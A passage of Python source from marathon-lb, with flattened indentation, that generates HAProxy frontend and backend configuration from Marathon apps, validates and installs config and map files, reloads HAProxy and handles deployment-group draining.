health_check_port = get_backend_port(
apps,
app,
backend_service_idx)
backends += _get_health_check_options(
template_backend_health_check,
app.healthCheck,
health_check_port)
do_backend_healthcheck_options_once = False
logger.debug(
"backend server %s:%d on %s",
backendServer.ip,
backendServer.port,
backendServer.host)
# Create a unique, friendly name for the backend server. We concat
# the host, task IP and task port together. If the host and task
# IP are actually the same then omit one for clarity.
if backendServer.host != backendServer.ip:
serverName = re.sub(
r'[^a-zA-Z0-9\-]', '_',
(backendServer.host + '_' +
backendServer.ip + '_' +
str(backendServer.port)))
else:
serverName = re.sub(
r'[^a-zA-Z0-9\-]', '_',
(backendServer.ip + '_' +
str(backendServer.port)))
shortHashedServerName = hashlib.sha1(serverName.encode()) \
.hexdigest()[:10]
# In order to keep the state of backend servers consistent between
# reloads, server IDs need to be stable. See
            # calculate_server_id()'s docstring to learn how it is achieved.
server_id = calculate_server_id(serverName, taken_server_ids)
server_health_check_options = None
if app.healthCheck:
template_server_healthcheck_options = None
if app.mode == 'tcp' \
or app.healthCheck['protocol'] == 'TCP' \
or app.healthCheck['protocol'] == 'MESOS_TCP':
template_server_healthcheck_options = templater \
.haproxy_backend_server_tcp_healthcheck_options(app)
elif app.mode == 'http':
template_server_healthcheck_options = templater \
.haproxy_backend_server_http_healthcheck_options(app)
if template_server_healthcheck_options:
if app.healthcheck_port_index is not None:
health_check_port = \
get_backend_port(apps, app, backend_service_idx)
else:
health_check_port = app.healthCheck.get('port')
server_health_check_options = _get_health_check_options(
template_server_healthcheck_options,
app.healthCheck,
health_check_port)
backend_server_options = templater \
.haproxy_backend_server_options(app)
backends += backend_server_options.format(
host=backendServer.host,
host_ipv4=backendServer.ip,
port=backendServer.port,
serverName=serverName,
serverId=server_id,
cookieOptions=' check cookie ' + shortHashedServerName
if app.sticky else '',
healthCheckOptions=server_health_check_options
if server_health_check_options else '',
otherOptions=' disabled' if backendServer.draining else ''
)
http_frontend_list.sort(key=lambda x: x[0], reverse=True)
https_frontend_list.sort(key=lambda x: x[0], reverse=True)
for backend in http_frontend_list:
http_frontends += backend[1]
if group_https_by_vhosts:
for backend in sorted(https_grouped_frontend_list.keys()):
https_frontends +=\
templater.haproxy_https_grouped_vhost_frontend_acl.format(
backend=re.sub(r'[^a-zA-Z0-9\-]', '_', backend),
host=backend)
else:
for backend in https_frontend_list:
https_frontends += backend[1]
config += userlists
if bind_http_https:
config += http_frontends
config += http_appid_frontends
if bind_http_https:
config += https_frontends
if group_https_by_vhosts:
for vhost in sorted(https_grouped_frontend_list.keys()):
config +=\
templater\
.haproxy_https_grouped_vhost_backend_head\
.format(
name=re.sub(r'[^a-zA-Z0-9\-]', '_', vhost))
frontend = templater \
.haproxy_https_grouped_vhost_frontend_head \
.format(name=re.sub(r'[^a-zA-Z0-9\-]', '_', vhost),
sslCerts=" ".join(
map(lambda cert: "crt " + cert,
defaultValue(
https_grouped_frontend_list[vhost][1],
set(_ssl_certs)))),
bindOpts=" ".join(
map(lambda opts: " " + opts,
https_grouped_frontend_list[vhost][2]))
)
for v in sorted(
https_grouped_frontend_list[vhost][0],
key=lambda x: x[0],
reverse=True):
frontend += v[1]
config += frontend
config += frontends
config += backends
return config
def defaultValue(col, default):
if len(col) == 0:
return default
else:
return col
def get_haproxy_pids():
try:
return set(map(lambda i: int(i), subprocess.check_output(
"pidof haproxy",
stderr=subprocess.STDOUT,
shell=True).split()))
except subprocess.CalledProcessError as ex:
logger.debug("Unable to get haproxy pids: %s", ex)
return set()
def reloadConfig():
reloadCommand = []
if args.command:
reloadCommand = shlex.split(args.command)
else:
logger.debug("No reload command provided, trying to find out how to" +
" reload the configuration")
if os.path.isfile('/etc/init/haproxy.conf'):
logger.debug("we seem to be running on an Upstart based system")
reloadCommand = ['reload', 'haproxy']
elif (os.path.isfile('/usr/lib/systemd/system/haproxy.service') or
os.path.isfile('/lib/systemd/system/haproxy.service') or
os.path.isfile('/etc/systemd/system/haproxy.service')):
logger.debug("we seem to be running on systemd based system")
reloadCommand = ['systemctl', 'reload', 'haproxy']
elif os.path.isfile('/etc/init.d/haproxy'):
logger.debug("we seem to be running on a sysvinit based system")
reloadCommand = ['/etc/init.d/haproxy', 'reload']
else:
# if no haproxy exists (maybe running in a container)
logger.debug("no haproxy detected. won't reload.")
reloadCommand = None
if reloadCommand:
logger.info("reloading using %s", " ".join(reloadCommand))
try:
start_time = time.time()
checkpoint_time = start_time
            # Retry or log the reload every --reload-interval seconds
reload_frequency = args.reload_interval
reload_retries = args.max_reload_retries
enable_retries = True
infinite_retries = False
if reload_retries == 0:
enable_retries = False
elif reload_retries < 0:
infinite_retries = True
old_pids = get_haproxy_pids()
subprocess.check_call(reloadCommand, close_fds=True)
new_pids = get_haproxy_pids()
logger.debug("Waiting for new haproxy pid (old pids: [%s], " +
"new_pids: [%s])...", old_pids, new_pids)
# Wait until the reload actually occurs and there's a new PID
while True:
if len(new_pids - old_pids) >= 1:
logger.debug("new pids: [%s]", new_pids)
logger.debug("reload finished, took %s seconds",
time.time() - start_time)
break
timeSinceCheckpoint = time.time() - checkpoint_time
if (timeSinceCheckpoint >= reload_frequency):
logger.debug("Still waiting for new haproxy pid after " +
"%s seconds (old pids: [%s], " +
"new_pids: [%s]).",
time.time() - start_time, old_pids, new_pids)
checkpoint_time = time.time()
if enable_retries:
if not infinite_retries:
reload_retries -= 1
if reload_retries == 0:
logger.debug("reload failed after %s seconds",
time.time() - start_time)
break
logger.debug("Attempting reload again...")
subprocess.check_call(reloadCommand, close_fds=True)
time.sleep(0.1)
new_pids = get_haproxy_pids()
except OSError as ex:
logger.error("unable to reload config using command %s",
" ".join(reloadCommand))
logger.error("OSError: %s", ex)
except subprocess.CalledProcessError as ex:
logger.error("unable to reload config using command %s",
" ".join(reloadCommand))
logger.error("reload returned non-zero: %s", ex)
def generateHttpVhostAcl(
templater, app, backend, haproxy_map, map_array,
haproxy_dir, duplicate_map):
# If the hostname contains the delimiter ',', then the marathon app is
# requesting multiple hostname matches for the same backend, and we need
# to use alternate templates from the default one-acl/one-use_backend.
staging_http_frontends = ""
staging_https_frontends = ""
https_grouped_frontend_list = defaultdict(lambda: ([], set(), set()))
if "," in app.hostname:
logger.debug(
"vhost label specifies multiple hosts: %s", app.hostname)
vhosts = app.hostname.split(',')
acl_name = re.sub(r'[^a-zA-Z0-9\-]', '_', vhosts[0]) + \
'_' + app.appId[1:].replace('/', '_')
if app.path:
if app.authRealm:
# Set the path ACL if it exists
logger.debug("adding path acl, path=%s", app.path)
http_frontend_acl = \
templater.\
haproxy_http_frontend_acl_only_with_path_and_auth(app)
staging_http_frontends += http_frontend_acl.format(
path=app.path,
cleanedUpHostname=acl_name,
hostname=vhosts[0],
realm=app.authRealm,
backend=backend
)
https_frontend_acl = \
templater.\
haproxy_https_frontend_acl_only_with_path(app)
staging_https_frontends += https_frontend_acl.format(
path=app.path,
cleanedUpHostname=acl_name,
hostname=vhosts[0],
realm=app.authRealm,
backend=backend
)
else:
# Set the path ACL if it exists
logger.debug("adding path acl, path=%s", app.path)
http_frontend_acl = \
templater.haproxy_http_frontend_acl_only_with_path(app)
staging_http_frontends += http_frontend_acl.format(
path=app.path,
backend=backend
)
https_frontend_acl = \
templater.haproxy_https_frontend_acl_only_with_path(app)
staging_https_frontends += https_frontend_acl.format(
path=app.path,
backend=backend
)
temp_frontend_head = staging_https_frontends
for vhost_hostname in vhosts:
https_grouped_frontend_list[vhost_hostname][0].append(
(app.backend_weight, temp_frontend_head))
if app.sslCert is not None:
https_grouped_frontend_list[vhost_hostname][1].add(app.sslCert)
if app.bindOptions is not None:
https_grouped_frontend_list[vhost_hostname][2].add(
app.bindOptions)
logger.debug("processing vhost %s", vhost_hostname)
if haproxy_map and not app.path and not app.authRealm and \
not app.redirectHttpToHttps:
if 'map_http_frontend_acl' not in duplicate_map:
app.backend_weight = -1
http_frontend_acl = templater.\
haproxy_map_http_frontend_acl_only(app)
staging_http_frontends += http_frontend_acl.format(
haproxy_dir=haproxy_dir
)
duplicate_map['map_http_frontend_acl'] = 1
map_element = {}
map_element[vhost_hostname] = backend
if map_element not in map_array:
map_array.append(map_element)
else:
http_frontend_acl = templater.\
haproxy_http_frontend_acl_only(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=vhost_hostname
)
# Tack on the SSL ACL as well
if app.path:
if app.authRealm:
https_frontend_acl = templater.\
haproxy_https_frontend_acl_with_auth_and_path(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=vhost_hostname,
appId=app.appId,
realm=app.authRealm,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[vhost_hostname][0].append(
(app.backend_weight, staging_https_frontend))
else:
https_frontend_acl = \
templater.haproxy_https_frontend_acl_with_path(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=vhost_hostname,
appId=app.appId,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[vhost_hostname][0].append(
(app.backend_weight, staging_https_frontend))
else:
if app.authRealm:
https_frontend_acl = \
templater.haproxy_https_frontend_acl_with_auth(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=vhost_hostname,
appId=app.appId,
realm=app.authRealm,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[vhost_hostname][0].append(
(app.backend_weight, staging_https_frontend))
else:
if haproxy_map:
if 'map_https_frontend_acl' not in duplicate_map:
app.backend_weight = -1
https_frontend_acl = templater.\
haproxy_map_https_frontend_acl(app)
staging_https_frontend = https_frontend_acl. \
format(
hostname=vhost_hostname,
haproxy_dir=haproxy_dir
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[vhost_hostname][0]\
.append(
(app.backend_weight, staging_https_frontend))
duplicate_map['map_https_frontend_acl'] = 1
map_element = {}
map_element[vhost_hostname] = backend
if map_element not in map_array:
map_array.append(map_element)
else:
https_frontend_acl = templater.\
haproxy_https_frontend_acl(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=vhost_hostname,
appId=app.appId,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[vhost_hostname][0].append(
(app.backend_weight, staging_https_frontend))
# We've added the http acl lines, now route them to the same backend
if app.redirectHttpToHttps:
logger.debug("writing rule to redirect http to https traffic")
if app.path:
haproxy_backend_redirect_http_to_https = \
templater.\
haproxy_backend_redirect_http_to_https_with_path(app)
frontend = haproxy_backend_redirect_http_to_https.format(
bindAddr=app.bindAddr,
cleanedUpHostname=acl_name,
backend=backend
)
staging_http_frontends += frontend
else:
haproxy_backend_redirect_http_to_https = \
templater.haproxy_backend_redirect_http_to_https(app)
frontend = haproxy_backend_redirect_http_to_https.format(
bindAddr=app.bindAddr,
cleanedUpHostname=acl_name
)
staging_http_frontends += frontend
elif app.path:
if app.authRealm:
http_frontend_route = \
templater.\
haproxy_http_frontend_routing_only_with_path_and_auth(app)
staging_http_frontends += http_frontend_route.format(
cleanedUpHostname=acl_name,
realm=app.authRealm,
backend=backend
)
else:
http_frontend_route = \
templater.haproxy_http_frontend_routing_only_with_path(app)
staging_http_frontends += http_frontend_route.format(
cleanedUpHostname=acl_name,
backend=backend
)
else:
if app.authRealm:
http_frontend_route = \
templater.\
haproxy_http_frontend_routing_only_with_auth(app)
staging_http_frontends += http_frontend_route.format(
cleanedUpHostname=acl_name,
realm=app.authRealm,
backend=backend
)
else:
if not haproxy_map:
http_frontend_route = \
templater.haproxy_http_frontend_routing_only(app)
staging_http_frontends += http_frontend_route.format(
cleanedUpHostname=acl_name,
backend=backend
)
else:
# A single hostname in the VHOST label
logger.debug(
"adding virtual host for app with hostname %s", app.hostname)
acl_name = re.sub(r'[^a-zA-Z0-9\-]', '_', app.hostname) + \
'_' + app.appId[1:].replace('/', '_')
if app.sslCert is not None:
https_grouped_frontend_list[app.hostname][1].add(app.sslCert)
if app.bindOptions is not None:
https_grouped_frontend_list[app.hostname][2].add(app.bindOptions)
if app.path:
if app.redirectHttpToHttps:
http_frontend_acl = \
templater.haproxy_http_frontend_acl_only(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname
)
http_frontend_acl = \
templater.haproxy_http_frontend_acl_only_with_path(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
path=app.path,
backend=backend
)
haproxy_backend_redirect_http_to_https = \
templater.\
haproxy_backend_redirect_http_to_https_with_path(app)
frontend = haproxy_backend_redirect_http_to_https.format(
bindAddr=app.bindAddr,
cleanedUpHostname=acl_name,
backend=backend
)
staging_http_frontends += frontend
else:
if app.authRealm:
http_frontend_acl = \
templater.\
haproxy_http_frontend_acl_with_auth_and_path(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
path=app.path,
appId=app.appId,
realm=app.authRealm,
backend=backend
)
else:
http_frontend_acl = \
templater.haproxy_http_frontend_acl_with_path(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
path=app.path,
appId=app.appId,
backend=backend
)
https_frontend_acl = \
templater.haproxy_https_frontend_acl_only_with_path(app)
staging_https_frontend = https_frontend_acl.format(
path=app.path,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[app.hostname][0].append(
(app.backend_weight, staging_https_frontend))
if app.authRealm:
https_frontend_acl = \
templater.\
haproxy_https_frontend_acl_with_auth_and_path(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
path=app.path,
appId=app.appId,
realm=app.authRealm,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[app.hostname][0].append(
(app.backend_weight, staging_https_frontend))
else:
https_frontend_acl = \
templater.haproxy_https_frontend_acl_with_path(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
appId=app.appId,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[app.hostname][0].append(
(app.backend_weight, staging_https_frontend))
else:
if app.redirectHttpToHttps:
http_frontend_acl = \
templater.haproxy_http_frontend_acl(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
backend=backend
)
haproxy_backend_redirect_http_to_https = \
templater.\
haproxy_backend_redirect_http_to_https(app)
frontend = haproxy_backend_redirect_http_to_https.format(
bindAddr=app.bindAddr,
cleanedUpHostname=acl_name
)
staging_http_frontends += frontend
else:
if app.authRealm:
http_frontend_acl = \
templater.haproxy_http_frontend_acl_with_auth(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
appId=app.appId,
realm=app.authRealm,
backend=backend
)
else:
if haproxy_map:
if 'map_http_frontend_acl' not in duplicate_map:
app.backend_weight = -1
http_frontend_acl = \
templater.haproxy_map_http_frontend_acl(app)
staging_http_frontends += http_frontend_acl.format(
haproxy_dir=haproxy_dir
)
duplicate_map['map_http_frontend_acl'] = 1
map_element = {}
map_element[app.hostname] = backend
if map_element not in map_array:
map_array.append(map_element)
else:
http_frontend_acl = \
templater.haproxy_http_frontend_acl(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
appId=app.appId,
backend=backend
)
if app.authRealm:
https_frontend_acl = \
templater.haproxy_https_frontend_acl_with_auth(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
appId=app.appId,
realm=app.authRealm,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[app.hostname][0].append(
(app.backend_weight, staging_https_frontend))
else:
if haproxy_map:
if 'map_https_frontend_acl' not in duplicate_map:
app.backend_weight = -1
https_frontend_acl = templater.\
haproxy_map_https_frontend_acl(app)
staging_https_frontend = https_frontend_acl.format(
hostname=app.hostname,
haproxy_dir=haproxy_dir
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[app.hostname][0].append(
(app.backend_weight, staging_https_frontend))
duplicate_map['map_https_frontend_acl'] = 1
map_element = {}
map_element[app.hostname] = backend
if map_element not in map_array:
map_array.append(map_element)
else:
https_frontend_acl = templater.\
haproxy_https_frontend_acl(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
appId=app.appId,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[app.hostname][0].append(
(app.backend_weight, staging_https_frontend))
return (app.backend_weight,
staging_http_frontends,
staging_https_frontends,
https_grouped_frontend_list)
def writeConfigAndValidate(
config, config_file, domain_map_string, domain_map_file,
app_map_string, app_map_file, haproxy_map):
# Test run, print to stdout and exit
if args.dry:
print(config)
sys.exit()
temp_config = config
# First write the new maps to temporary files
if haproxy_map:
domain_temp_map_file = writeReplacementTempFile(domain_map_string,
domain_map_file)
app_temp_map_file = writeReplacementTempFile(app_map_string,
app_map_file)
# Change the file paths in the config to (temporarily) point to the
# temporary map files so those can also be checked when the config is
# validated
temp_config = config.replace(
domain_map_file, domain_temp_map_file
).replace(app_map_file, app_temp_map_file)
# Write the new config to a temporary file
haproxyTempConfigFile = writeReplacementTempFile(temp_config, config_file)
if validateConfig(haproxyTempConfigFile):
# Move into place
if haproxy_map:
moveTempFile(domain_temp_map_file, domain_map_file, "domain_map")
moveTempFile(app_temp_map_file, app_map_file, "app_map")
# Edit the config file again to point to the actual map paths
with open(haproxyTempConfigFile, 'w') as tempConfig:
tempConfig.write(config)
else:
truncateMapFileIfExists(domain_map_file)
truncateMapFileIfExists(app_map_file)
moveTempFile(haproxyTempConfigFile, config_file, "hap_cfg")
return True
else:
moveTempFile(haproxyTempConfigFile, 'haproxy_tmp_conf_fail',
'haproxy_temp_config_fail')
if haproxy_map:
removeTempFileIfExist(domain_temp_map_file)
removeTempFileIfExist(app_temp_map_file)
return False
def writeReplacementTempFile(content, file_to_replace):
# Create a temporary file containing the given content that will be used to
# replace the given file after validation. Returns the path to the
# temporary file.
fd, tempFile = mkstemp()
logger.debug(
"writing temp file %s that will replace %s", tempFile, file_to_replace)
with os.fdopen(fd, 'w') as tempConfig:
tempConfig.write(content)
# Ensure the new file is created with the same permissions the old file had
# or use defaults if the file doesn't exist yet
perms = 0o644
if os.path.isfile(file_to_replace):
perms = stat.S_IMODE(os.lstat(file_to_replace).st_mode)
os.chmod(tempFile, perms)
return tempFile
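# Illustrative sketch (hypothetical content; /etc/haproxy/haproxy.cfg is just
# the default config path): the temporary file picks up the permissions of the
# file it is meant to replace, so moving it into place later preserves mode
# bits such as 0644.
def _example_write_replacement_temp_file():
    tmp = writeReplacementTempFile("# generated haproxy config\n",
                                   "/etc/haproxy/haproxy.cfg")
    # ... validate the temporary file here, then move it into place with
    # moveTempFile() or clean it up:
    os.remove(tmp)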
def validateConfig(haproxy_config_file):
# If skip validation flag is provided, don't check.
if args.skip_validation:
logger.debug("skipping validation.")
return True
# Check that config is valid
cmd = ['haproxy', '-f', haproxy_config_file, '-c']
logger.debug("checking config with command: " + str(cmd))
returncode = subprocess.call(args=cmd)
if returncode == 0:
return True
else:
logger.error("haproxy returned non-zero when checking config")
return False
def moveTempFile(temp_file, dest_file, tmp_filename):
# Replace the old file with the new from its temporary location
for suffix in range(args.archive_versions - 1, 0, -1):
tmp_src_file = "/tmp/" + tmp_filename + "." + str(suffix)
tmp_dest_file = "/tmp/" + tmp_filename + "." + str(suffix + 1)
if os.path.isfile(tmp_src_file):
logger.debug("Copying temp file %s to %s",
tmp_src_file, tmp_dest_file)
copy(tmp_src_file, tmp_dest_file)
logger.debug("Copying temp files %s to %s",
temp_file, "/tmp/" + tmp_filename + ".1")
copy(temp_file, "/tmp/" + tmp_filename + ".1")
logger.debug("moving temp file %s to %s", temp_file, dest_file)
move(temp_file, dest_file)
def truncateMapFileIfExists(map_file):
if os.path.isfile(map_file):
logger.debug("Truncating map file as haproxy-map flag "
"is disabled %s", map_file)
fd = os.open(map_file, os.O_RDWR)
os.ftruncate(fd, 0)
os.close(fd)
def removeTempFileIfExist(temp_file):
if os.path.isfile(temp_file):
logger.debug("delete tempfile %s", temp_file)
os.remove(temp_file)
def generateAndValidateTempConfig(config, config_file, domain_map_array,
app_map_array, haproxy_map):
temp_config_file = "%s.tmp" % config_file
domain_map_file = os.path.join(os.path.dirname(temp_config_file),
"domain2backend.map.tmp")
app_map_file = os.path.join(os.path.dirname(temp_config_file),
"app2backend.map.tmp")
domain_map_string = str()
app_map_string = str()
if haproxy_map:
domain_map_string = generateMapString(domain_map_array)
app_map_string = generateMapString(app_map_array)
return writeConfigAndValidate(
config, temp_config_file, domain_map_string, domain_map_file,
app_map_string, app_map_file, haproxy_map)
def compareWriteAndReloadConfig(config, config_file, domain_map_array,
app_map_array, haproxy_map):
changed = False
config_valid = False
# See if the last config on disk matches this, and if so don't reload
# haproxy
domain_map_file = os.path.join(os.path.dirname(config_file),
"domain2backend.map")
app_map_file = os.path.join(os.path.dirname(config_file),
"app2backend.map")
domain_map_string = str()
app_map_string = str()
runningConfig = str()
try:
logger.debug("reading running config from %s", config_file)
with open(config_file, "r") as f:
runningConfig = f.read()
except IOError:
logger.warning("couldn't open config file for reading")
if haproxy_map:
domain_map_string = generateMapString(domain_map_array)
app_map_string = generateMapString(app_map_array)
if (runningConfig != config or
compareMapFile(domain_map_file, domain_map_string) or
compareMapFile(app_map_file, app_map_string)):
logger.info(
"running config/map is different from generated"
" config - reloading")
if writeConfigAndValidate(
config, config_file, domain_map_string, domain_map_file,
app_map_string, app_map_file, haproxy_map):
reloadConfig()
changed = True
config_valid = True
else:
logger.warning("skipping reload: config/map not valid")
changed = True
config_valid = False
else:
logger.debug("skipping reload: config/map unchanged")
changed = False
config_valid = True
else:
truncateMapFileIfExists(domain_map_file)
truncateMapFileIfExists(app_map_file)
if runningConfig != config:
logger.info(
"running config is different from generated config"
" - reloading")
if writeConfigAndValidate(
config, config_file, domain_map_string, domain_map_file,
app_map_string, app_map_file, haproxy_map):
reloadConfig()
changed = True
config_valid = True
else:
logger.warning("skipping reload: config not valid")
changed = True
config_valid = False
else:
changed = False
config_valid = True
logger.debug("skipping reload: config unchanged")
return changed, config_valid
def generateMapString(map_array):
# Generate the string representation of the map file from a map array
map_string = str()
for element in map_array:
for key, value in list(element.items()):
map_string = map_string + str(key) + " " + str(value) + "\n"
return map_string
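# Illustrative sketch (hypothetical hostnames and backend names): shows the
# "key value" line format that generateMapString() emits, which is the format
# HAProxy expects in a map file.
def _example_generate_map_string():
    sample_map_array = [
        {"app.example.com": "nginx_10080"},
        {"api.example.com": "api_10081"},
    ]
    # Returns "app.example.com nginx_10080\napi.example.com api_10081\n"
    return generateMapString(sample_map_array)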
def compareMapFile(map_file, map_string):
# Read the map file (creating an empty file if it does not exist) and
# compare its contents to the given map string. Returns true if the map
# string is different to the contents of the file.
if not os.path.isfile(map_file):
open(map_file, 'a').close()
runningmap = str()
try:
logger.debug("reading map config from %s", map_file)
with open(map_file, "r") as f:
runningmap = f.read()
except IOError:
logger.warning("couldn't open map file for reading")
return runningmap != map_string
def get_health_check(app, portIndex):
if 'healthChecks' not in app:
return None
for check in app['healthChecks']:
if check.get('port'):
return check
if check.get('portIndex') == portIndex:
return check
return None
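# Illustrative sketch (hypothetical app dict): a health check carrying an
# explicit 'port' wins regardless of the requested portIndex; otherwise the
# check whose 'portIndex' matches is returned, or None if nothing matches.
def _example_get_health_check():
    app = {'healthChecks': [
        {'portIndex': 0, 'protocol': 'MESOS_HTTP', 'path': '/ping'},
        {'portIndex': 1, 'protocol': 'TCP'},
    ]}
    assert get_health_check(app, 1) == {'portIndex': 1, 'protocol': 'TCP'}
    assert get_health_check(app, 5) is None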
healthCheckResultCache = LRUCache()
def get_apps(marathon, apps=None):
    if not apps:
apps = marathon.list()
logger.debug("got apps %s", [app["id"] for app in apps])
excluded_states = {'TASK_KILLING', 'TASK_KILLED',
'TASK_FINISHED', 'TASK_ERROR'}
marathon_apps = []
    # This process requires 2 passes: the first pass gathers and merges apps
    # that belong to the same deployment group; the second pass builds the
    # MarathonApp and MarathonService objects from the processed apps.
processed_apps = []
deployment_groups = {}
for app in apps:
deployment_group = None
if 'HAPROXY_DEPLOYMENT_GROUP' in app['labels']:
deployment_group = app['labels']['HAPROXY_DEPLOYMENT_GROUP']
# mutate the app id to match deployment group
if deployment_group[0] != '/':
deployment_group = '/' + deployment_group
app['id'] = deployment_group
else:
processed_apps.append(app)
continue
if deployment_group in deployment_groups:
# merge the groups, with the oldest taking precedence
prev = deployment_groups[deployment_group]
cur = app
# If for some reason neither label is set correctly, then it's a
# crapshoot. Most likely, whichever one is unset was not deployed
# with ZDD, so we should prefer the one with a date set.
cur_date = datetime.datetime.min
prev_date = datetime.datetime.min
if 'HAPROXY_DEPLOYMENT_STARTED_AT' in prev['labels']:
prev_date = dateutil.parser.parse(
prev['labels']['HAPROXY_DEPLOYMENT_STARTED_AT'])
if 'HAPROXY_DEPLOYMENT_STARTED_AT' in cur['labels']:
cur_date = dateutil.parser.parse(
cur['labels']['HAPROXY_DEPLOYMENT_STARTED_AT'])
old = new = None
if prev_date < cur_date:
old = prev
new = cur
else:
new = prev
old = cur
if 'HAPROXY_DEPLOYMENT_NEW_INSTANCES' in new['labels']:
                if int(new['labels']['HAPROXY_DEPLOYMENT_NEW_INSTANCES']) != 0:
new_scale_time = dateutil.parser.parse(
new['versionInfo']['lastScalingAt'])
old_scale_time = dateutil.parser.parse(
old['versionInfo']['lastScalingAt'])
if old_scale_time > new_scale_time:
temp = old
old = new
new = temp
target_instances = \
int(new['labels']['HAPROXY_DEPLOYMENT_TARGET_INSTANCES'])
else:
target_instances = 1
# Mark N tasks from old app as draining, where N is the
# number of instances in the new app. Sort the old tasks so that
# order is deterministic (i.e. so that we always drain the same
# tasks).
old_tasks = sorted(old['tasks'], key=lambda task: task['id'])
healthy_new_instances = 0
if len(app['healthChecks']) > 0:
for task in new['tasks']:
if 'healthCheckResults' not in task:
continue
alive = True
for result in task['healthCheckResults']:
if not result['alive']:
alive = False
if alive:
healthy_new_instances += 1
else:
healthy_new_instances = new['instances']
maximum_drainable = \
max(0, (healthy_new_instances + old['instances']) -
target_instances)
for i in range(0, min(len(old_tasks),
healthy_new_instances,
maximum_drainable)):
old_tasks[i]['draining'] = True
# merge tasks from new app into old app
merged = old
old_tasks.extend(new['tasks'])
merged['tasks'] = old_tasks
deployment_groups[deployment_group] = merged
else:
deployment_groups[deployment_group] = app
processed_apps.extend(deployment_groups.values())
    # Reset the service port assigner. This forces the port assigner to
    # re-assign ports for IP-per-task applications. The upshot is that
    # the service port for a particular app may change dynamically, but
    # it will be deterministic and identical across all instances of
    # marathon-lb.
SERVICE_PORT_ASSIGNER.reset()
for app in processed_apps:
appId = app['id']
if appId[1:] == os.environ.get("FRAMEWORK_NAME"):
continue
marathon_app = MarathonApp(marathon, appId, app)
if 'HAPROXY_GROUP' in marathon_app.app['labels']:
marathon_app.groups = \
marathon_app.app['labels']['HAPROXY_GROUP'].split(',')
marathon_apps.append(marathon_app)
service_ports = SERVICE_PORT_ASSIGNER.get_service_ports(app)
for i, servicePort in enumerate(service_ports):
if servicePort is None:
logger.warning("Skipping undefined service port")
continue
service = MarathonService(appId, servicePort,
get_health_check(app, i),
marathon.strict_mode())
for key_unformatted in label_keys:
key = key_unformatted.format(i)
if key in marathon_app.app['labels']:
func = label_keys[key_unformatted]
func(service,
key_unformatted,
marathon_app.app['labels'][key])
            # https://github.com/mesosphere/marathon-lb/issues/198
            # A Marathon app manifest defines healthChecks for a specific
            # service port, identified by either a port or a portIndex.
            # (Marathon itself prefers port over portIndex:
            # https://mesosphere.github.io/marathon/docs/health-checks.html)
            #
            # We want to be able to instruct HAProxy to use the health
            # check defined for service port B in Marathon to decide
            # whether service port A is healthy in HAProxy.
            #
            # This is done by specifying a label:
            # HAPROXY_{n}_BACKEND_HEALTHCHECK_PORT_INDEX
            #
            # TODO(norangshol) Refactor and supply MarathonService
            # TODO(norangshol) with its labels and do this in its constructor?
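            #
            # Illustrative sketch (hypothetical labels, not taken from a real
            # app definition): advertise service port index 0, but use the
            # health check defined for port index 1:
            #
            #   "labels": {
            #       "HAPROXY_GROUP": "external",
            #       "HAPROXY_0_BACKEND_HEALTHCHECK_PORT_INDEX": "1"
            #   }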
if service.healthCheck is None \
and service.healthcheck_port_index is not None:
service.healthCheck = \
get_health_check(app, service.healthcheck_port_index)
if service.healthCheck:
healthProto = service.healthCheck['protocol']
if healthProto in ['HTTP', 'HTTPS', 'MESOS_HTTP',
'MESOS_HTTPS']:
service.mode = 'http'
marathon_app.services[servicePort] = service
for task in app['tasks']:
# Marathon 0.7.6 bug workaround
if not task['host']:
logger.warning("Ignoring Marathon task without host " +
task['id'])
continue
# 'state' will not be present in test cases.
# Should always be present in an actual cluster
if 'state' in task and task['state'] in excluded_states:
logger.warning("Ignoring non-running task " + task['id'] +
" with state " + task['state'])
continue
if marathon.health_check() and 'healthChecks' in app and \
len(app['healthChecks']) > 0:
alive = True
if 'healthCheckResults' not in task:
# use previously cached result, if it exists
if not healthCheckResultCache.get(task['id'], False):
continue
else:
for result in task['healthCheckResults']:
if not result['alive']:
alive = False
healthCheckResultCache.set(task['id'], alive)
if not alive:
continue
task_ip, task_ports = get_task_ip_and_ports(app, task)
if task_ip is None:
logger.warning("Task has no resolvable IP address - skip")
continue
draining = task.get('draining', False)
# if different versions of app have different number of ports,
# try to match as many ports as possible
for task_port, service_port in zip(task_ports, service_ports):
service = marathon_app.services.get(service_port, None)
if service:
service.groups = marathon_app.groups
service.add_backend(task['host'],
task_ip,
task_port,
